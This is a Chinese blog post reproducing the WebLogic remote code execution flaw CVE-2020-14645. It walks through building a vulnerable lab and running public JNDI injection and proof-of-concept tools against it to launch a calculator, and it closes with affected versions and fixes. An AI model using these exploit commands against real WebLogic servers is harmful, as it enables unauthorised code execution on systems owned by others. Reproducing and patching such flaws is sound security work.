CVE-2020-14645 | Weblogic远程代码执行漏洞复现

0x01 漏洞简述

WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。Oracle WebLogic Server存在远程代码执行漏洞。攻击者可利用漏洞实现远程代码执行。

0x02 环境搭建

WebLogic 12.2.1.4官方下载链接:

https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_lite_Disk1_1of1.zip

下载JDK 6u211/7u201/8u191任意版本并配置环境变量

JDK8u191
下载地址:https://pan.baidu.com/s/1cCtSolwsZCmL7xN6orTjTw
提取码:nmi1

用管理员权限打开CMD命令

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

09125-085lz2enxp9u.png

疯狂点击下一步进行安装,并勾选自助启动配置向导选项

进入配置向导,创建新域并勾选全部模板,直至安装完成

72657-b86fz6zkx2e.png
16731-j86x8aquv3j.png

安装成功后,跳到base_domain目录下

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

运行startWebLogic.cmd
81854-4ompfmoz2k7.png

可访问7001端口,说明环境部署成功
95472-85y49vhdub5.png

0x03 漏洞复现

JNDI工具下载地址

https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

使用JNDI工具搭建LDAP和HTTP服务,注意不能占用8180/1099/1389三个端口,修改要执行的命令后回车,会同时启动LDAP/RMI/HTTP三种服务,并且自动编译好带命令的class文件
33654-o0jk92hqi9.png

使用CVE-2020-14645漏洞验证工具

https://github.com/DSO-Lab/Weblogic_CVE-2020-14645

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit http://192.168.33.250:7001

64477-2na9mgd9qdo.png

输入命令请求LDAP服务,执行自动编译的class文件,成功弹出计算器

10169-oj6z5m7yq2.png

0x04 影响范围

Oracle WebLogic Server 10.3.6.0.0

Oracle WebLogic Server 12.1.3.0.0

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0

Oracle WebLogic Server 14.1.1.0.0

0x05 修复方案

  1. Oracle官方已经发布了安全公告及相关补丁信息,修复了此漏洞,建议受影响用户尽快升级到安全版本。
  2. 漏洞产生于WebLogic默认启用的T3协议,可限制T3访问来源阻止攻击。
  3. 禁用IIOP协议。

参考链接:

https://www.oracle.com/security-alerts/cpujul2020.html

https://github.com/DSO-Lab/Weblogic_CVE-2020-14645

https://github.com/welk1n/JNDI-Injection-Exploit

https://docs.oracle.com/middleware/1213/wls/WLACH/taskhelp/channels/EnableAndConfigureIIOP.html

文章来源:
微信公众号:nearsec

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
“黑客”能改高考分,交钱就包过?教育部提醒:别上当!
« 上一篇 07-25
《我协助破案的那些年》故事三:网恋选我我超甜,又骗感情又骗钱,it从业者深陷网恋诈骗风波,人财两空
下一篇 » 07-26

相关推荐

Joomla漏洞总结

以下文章来源于黑白天 ,作者kevinJoomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现漏洞描述Joomla是一套内容管理系统,是使用P...

红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...

渗透某勒索服务器

这是 酒仙桥六号部队 的第 74 篇文章。全文共计1300个字,预计阅读时长5分钟。文章来源:六号刃部 - 酒仙桥六号部队 事情经过和我一起合租的室友喜欢...

Android渗透工具集合

Android安全测试更多地被安全行业用来测试Android应用程序中的漏洞。下面将列举全面的Android渗透测试工具和资源列表,其涵盖了在Andro...